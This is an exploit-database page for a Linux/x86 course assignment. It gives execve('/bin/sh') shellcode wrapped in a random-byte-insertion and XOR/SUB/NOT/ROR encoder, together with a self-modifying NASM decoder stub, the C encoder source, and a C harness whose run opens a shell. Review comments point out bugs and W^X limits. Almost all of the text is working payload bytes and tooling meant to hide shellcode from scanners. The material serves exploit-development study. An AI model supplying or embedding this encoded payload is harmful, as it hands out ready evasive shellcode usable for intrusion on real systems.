## https://sploitus.com/exploit?id=1337DAY-ID-33777
# Title: Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114)
# Author: Xenofon Vassilakopoulos 
# Tested on: Linux kali 5.3.0-kali2-686-pae #1 SMP Debian 5.3.9-3kali1 (2019-11-20) i686 GNU/Linux
# Architecture: i686 GNU/Linux
# Shellcode Length: 114 bytes
# SLAE-ID: SLAE - 1314 
# Description: Linux/x86 encoder that inserts random bytes into the execve(/bin/sh) shellcode and applies XOR/SUB/NOT/ROR; the matching decoder stub applies ROL/NOT/ADD/XOR and removes the inserted random bytes before execution


---------------------- execve-stack /bin/sh --------------------------------

;-----------------------------------------------------------------------
; execve("/bin//sh", argv, NULL) on x86-32 Linux via the int 0x80 interface
; (NASM, Intel syntax). This is the 25-byte payload that the encoder below
; transforms and the decoder stub reconstructs.
; Syscall args: eax = 11 (execve), ebx = pathname, ecx = argv, edx = envp.
; The path is pushed as two dwords ("/bin" + "//sh" — the doubled slash pads
; it to 8 bytes); the string terminator and the NULL pointers all come from
; the zeroed eax, so no 0x00 byte appears in the encoding.
; Register roles: eax = 0 / syscall number, ebx = path, ecx = argv, edx = envp.
;-----------------------------------------------------------------------
global _start
section .text
_start:
        xor eax, eax                    ; eax = 0
        push eax                        ; NUL terminator of the path string
        push 0x68732f2f                 ; "//sh"
        push 0x6e69622f                 ; "/bin"
        mov ebx, esp                    ; ebx -> "/bin//sh"
        push eax                        ; NULL: end of argv, also used as envp
        mov edx, esp                    ; edx -> NULL (envp)
        push ebx                        ; argv[0] = path pointer
        mov ecx, esp                    ; ecx -> argv
        mov al, 11                      ; __NR_execve (32-bit ABI)
        int 0x80

----------------------- Original Shellcode ---------------------------------


"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

		
----------- Decoder ROL/NOT/ADD/XOR + Removing inserted random bytes -------


;-----------------------------------------------------------------------
; Decoder stub (x86-32 Linux, NASM) for the encoded bytes stored after it.
; Three stages:
;   1. jmp/call/pop: `call decoder` pushes the address of EncodedShellcode
;      (the data immediately after the call) and `pop esi` picks it up —
;      the usual way to locate data in position-independent 32-bit code.
;   2. rotate: undo the per-byte encoding in place. encoder.c applies
;      XOR 0x2c, SUB 2, NOT, rotate 4; this loop applies the inverses in
;      reverse order: ROL 4, NOT, ADD 2, XOR 0x2c.
;   3. decode: the encoder interleaved one random byte after every payload
;      byte (payload at even offsets, filler at odd offsets); this pass
;      compacts the even-offset bytes into a contiguous run starting at
;      EncodedShellcode and then jumps to it.
; Stages 2 and 3 overwrite the stub's own bytes, so the page holding it
; must be both writable and executable — this is why the C harness below
; is built with -z execstack, and why a W^X mapping stops it.
; The encoding changes only the stored payload bytes: the jmp/call/pop
; sequence and the byte-wise ROL/NOT/ADD/XOR self-modifying loop remain
; in clear and are what a disassembler or emulating scanner sees.
; Register roles: esi = read pointer, edi = write pointer, cl = loop
; counter, dl = len (encoded length, 50), bl = byte scratch,
; al = offset of the next even-offset byte minus one.
;-----------------------------------------------------------------------
global _start

section .text

_start:
        jmp short call_shellcode        ; forward to the call so its return address = &EncodedShellcode
decoder:
        pop esi                         ; esi = &EncodedShellcode (the pushed return address)
        push esi                        ; keep a copy for the compaction pass
        xor ebx, ebx                    ; bl is the byte scratch used in decode
        xor ecx, ecx                    ; cl = bytes processed so far
        xor edx, edx
        mov dl, len                     ; dl = encoded length (8-bit immediate; 50 here)
rotate:
        ;; apply the decoding scheme: inverse of encoder.c, in reverse order
        rol byte [esi], 4               ; undo the 4-bit rotate
        not byte [esi]                  ; undo NOT
        add byte [esi], 2               ; undo SUB 2
        xor byte [esi], 0x2c            ; undo XOR 0x2c
        inc esi
        cmp cl, dl
        je  init                        ; NOTE(review): the compare follows the transform, so cl = 0..len gives len+1 iterations and the byte just past the data is transformed too; the decode pass below overwrites that byte, so it has no effect here
        inc cl
        jmp short rotate

init:
        pop esi                         ; esi = &EncodedShellcode again
        lea edi, [esi +1]               ; edi = write pointer; offset 0 already holds payload byte 0 and stays put
        xor eax, eax
        mov al, 1                       ; first read is [esi + 1 + 1] = offset 2
        xor ecx, ecx                    ; cl = bytes copied so far

decode:
        cmp cl, dl
        je EncodedShellcode             ; done: fall into the now-contiguous payload
        mov bl, byte [esi + eax + 1]    ; next even-offset byte (2, 4, 6, ...)
        mov byte [edi], bl              ; store it in the next contiguous slot
        inc edi
        inc cl
        add al, 2                       ; advance to the next even offset
        jmp short decode
        ; NOTE(review): this loop runs len (50) times, reading offsets up to 100
        ; (twice the encoded data) and writing 50 bytes. Only the first 25 copies
        ; are payload (the execve stub is 25 bytes, see "Shellcode Length 25");
        ; the remaining copies bring in whatever follows the data in memory. The
        ; payload ends in `int 0x80`, so on a successful execve the process image
        ; is replaced before those trailing bytes are ever reached.

call_shellcode:
        call decoder                    ; pushes the address of the bytes that follow
        EncodedShellcode: db 0x4e,0xc1,0x51,0x2f,0x58,0x3c,0xdb,0xac,0xef,0x82,0xef,0x1c,0x2a,0xd9,0xdb,0x90,0xdb,0x6b,0xef,0x61,0x3b,0x1c,0xcb,0x24,0xfb,0xd6,0xc5,0x50,0x23,0xfa,0x58,0x9c,0xc5,0xb1,0x33,0x97,0x28,0x31,0xc5,0xaa,0x43,0xf9,0x56,0xf4,0xad,0xc2,0x02,0x16,0x55,0xe3 ; 50 bytes of encoder.c output; differs per run because the interleaved filler is random (compare the encoder run further down)
        len equ $-EncodedShellcode      ; encoded length (50), used by mov dl, len above


---------  Encoder - Random Bytes Insertion + XOR/SUB/NOT/ROR  ---------------

xenofon@slae:~/Documents/Assignment4$ gcc -o encoder encoder.c
xenofon@slae:~/Documents/Assignment4$ ./encoder


Shellcode:

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80

Shellcode Length 25


Decoded Shellcode:

0x31,0xc0,0x50,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x50,0x89,0xe2,0x53,0x89,0xe1,0xb0,0x0b,0xcd,0x80,

Encoded shellcode

0x4e,0x70,0x51,0x61,0x58,0xf4,0xdb,0xe1,0xef,0xef,0xef,0x6a,0x2a,0x41,0xdb,0x4c,0xdb,0x20,0xef,0xbf,0x3b,0x78,0xcb,0x77,0xfb,0x57,0xc5,0x90,0x23,0x62,0x58,0xf0,0xc5,0xe1,0x33,0xe5,0x28,0x9d,0xc5,0x3d,0x43,0xf6,0x56,0x29,0xad,0x29,0x02,0x57,0x55,0x34,

Encoded Shellcode Length 50


xenofon@slae:~/Documents/Assignment4$ cat encoder.c

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>

#define DEC 0x2 // the value that will be subtracted from every byte (undone by `add byte [esi], 2` in the decoder)
#define XORVAL 0x2c // the value that every byte is XORed with (undone by `xor byte [esi], 0x2c` in the decoder)

// execve stack shellcode /bin/sh — the 25-byte payload from the NASM listing at the top.
// It contains no 0x00 byte, which is what makes the strlen() calls in main() usable on it.
unsigned char shellcode[] = \
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";

// Prints the payload, then emits a per-run encoded form of it: a random byte is
// interleaved after every payload byte (25 -> 50 bytes) and every byte of the
// doubled buffer then goes through XOR 0x2c, SUB 2, NOT and a 4-bit rotate. The
// NASM decoder stub above reverses exactly this (ROL 4, NOT, ADD 2, XOR 0x2c,
// then drops the odd-offset bytes).
// NOTE(review): `void main` is non-standard C (a hosted implementation expects
// `int main`); gcc accepts it with a warning.
void main()
{
        int rot = 4; //right rotation 4 bits — with rot == 4 a left and a right 8-bit rotate coincide; see the note at the rotate line
        printf("\n\nShellcode:\n\n");
        int o;
        // strlen() on the payload is valid only because it contains no 0x00 byte;
        // passing unsigned char* where strlen expects char* also draws a warning.
        for (o=0; o<strlen(shellcode); o++) {
                printf("\\x%02x", shellcode[o]);
        }
        printf("\n\nShellcode Length %d\n",sizeof(shellcode)-1); // NOTE(review): %d with a size_t argument; %zu is the portable spelling
        printf("\n\nDecoded Shellcode:\n\n");
        o=0;
        // same bytes again in 0x.. form: this is the plaintext the decoder must reproduce
        for (o; o<strlen(shellcode); o++) {
                printf("0x%02x,", shellcode[o]);
        }
        printf("\n");
        int i;
        unsigned char *buffer = (char*)malloc(sizeof(shellcode)*2);     // 52 bytes of random filler; only the odd indices are used
        srand((unsigned int)time(NULL));                                 // clock seed: every run produces a different encoded blob
        unsigned char *shellcode2=(char*)malloc(sizeof(shellcode)*2);   // 52 bytes; the doubled buffer fills 50, the last 2 are never written
        // placeholder to copy the random bytes using rand
        unsigned char shellcode3[] = "\xbb";
        int l = 0;                                                       // index of the next payload byte
        int k = 0;                                                       // i % 2: 0 = payload slot, 1 = filler slot
        int j;                                                           // unused
        // random byte insertion: even index i takes the next payload byte, odd index i takes a random byte
        for (i=0; i<(strlen(shellcode)*2); i++) {
                // generate random bytes
                buffer[i] = rand() & 0xff;
                memcpy(&shellcode3[0],(unsigned char*)&buffer[i],sizeof(buffer[i])); // one-byte copy, i.e. shellcode3[0] = buffer[i]
                k = i % 2;
                if (k == 0)
                {
                        shellcode2[i] = shellcode[l];
                        l++;
                }
                else
                {
                        shellcode2[i] = shellcode3[0];
                }
        }
        // apply the encoding scheme
        // NOTE(review): strlen(shellcode2) here and in the two loops below is applied
        // to a malloc'd block that is not NUL-terminated (the two bytes after the 50
        // written ones are uninitialised), which is undefined behaviour; it also
        // stops early if any byte of the doubled buffer is 0x00 (a random filler
        // byte can be 0). The doubled length is known: 2 * strlen(shellcode).
        for (i=0; i<strlen(shellcode2); i++) {
                // XOR every byte with 0x2c
                shellcode2[i] = shellcode2[i] ^ XORVAL;
                // subtract every byte by 2
                shellcode2[i] = shellcode2[i] - DEC;
                // one's complement negation
                shellcode2[i] = ~shellcode2[i];
                // perform the ROR method 
                // NOTE(review): sizeof(shellcode2[i]) is 1, so the shift counts are rot and
                // 8-rot. The operands are promoted to int, and truncation on assignment
                // back to unsigned char makes this an 8-bit rotate LEFT by rot (== rotate
                // right by 8-rot). For rot == 4 the two coincide, which is why the
                // decoder's `rol byte [esi], 4` undoes it; for any other rot the "ROR"
                // label and the decoder would both be wrong.
                shellcode2[i] = (shellcode2[i] << rot) | (shellcode2[i] >> sizeof(shellcode2[i])*(8-rot));
        }
        // print encoded shellcode (same strlen caveat as above)
        printf("\nEncoded shellcode\n\n");
        i=0;
        for (i; i<strlen(shellcode2); i++) {
                printf("0x%02x,", shellcode2[i]);
        }
        printf("\n\nEncoded Shellcode Length %d\n",strlen(shellcode2)); // NOTE(review): %d with a size_t argument
        free(shellcode2);
        free(buffer);
        printf("\n\n");
 }


-----------------------------------  Shellcode -------------------------------------

xenofon@slae:~/Documents/Assignment4$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
xenofon@slae:~/Documents/Assignment4$ ./shellcode
Shellcode Length:  117
$ whoami
xenofon


xenofon@slae:~/Documents/Assignment4$ cat shellcode.c
#include <stdio.h>
#include <string.h>

// Decoder stub followed by its 50 encoded bytes: 117 bytes in total (8 lines of
// 14 plus 5), matching the "Shellcode Length:  117" printed above. The bytes
// from "\x4e" onward (after the "\xe8\xbf\xff\xff\xff" call) are one encoder
// run's output and so differ from the other two runs shown on this page.
// Placed in .data (writable), which the self-modifying decoder needs.
unsigned char code[] = \

        "\xeb\x3c\x5e\x56\x31\xdb\x31\xc9\x31\xd2\xb2\x32\xc0\x06"
        "\x04\xf6\x16\x80\x06\x02\x80\x36\x2c\x46\x38\xd1\x74\x04"
        "\xfe\xc1\xeb\xec\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xc9"
        "\x8a\x1c\x06\x38\xd1\x74\x12\x8a\x5c\x06\x01\x88\x1f\x47"
        "\xfe\xc1\x04\x02\xeb\xec\xe8\xbf\xff\xff\xff\x4e\xd1\x51"
        "\xb4\x58\x37\xdb\x55\xef\x3d\xef\xbd\x2a\x59\xdb\x81\xdb"
        "\x56\xef\xae\x3b\x1a\xcb\xfa\xfb\x43\xc5\x49\x23\x12\x58"
        "\xd2\xc5\xee\x33\x82\x28\x49\xc5\xc3\x43\x30\x56\xcb\xad"
        "\xe1\x02\x8b\x55\x84";

// Test harness: prints the blob length and transfers control into it.
// strlen(code) is only meaningful because the blob has no 0x00 byte (the
// printed 117 equals the byte count of the array above).
// `code` is in .data, so it is writable — required by the self-modifying
// decoder — but not normally executable. NOTE(review): it executes here only
// because of the build shown above (-z execstack on this i686 kernel, which
// appears to make the whole image executable); on a current toolchain and
// kernel the .data mapping stays non-executable and ret() faults, which is
// the W^X behaviour a defender should expect. -fno-stack-protector has no
// effect on this file (no local arrays).
int main()
{
        printf("Shellcode Length:  %d\n", strlen(code)); // NOTE(review): %d with a size_t argument; %zu is portable
        int (*ret)() = (int(*)())code;  // treat the data array as a function
        ret();                          // does not return on a successful execve
}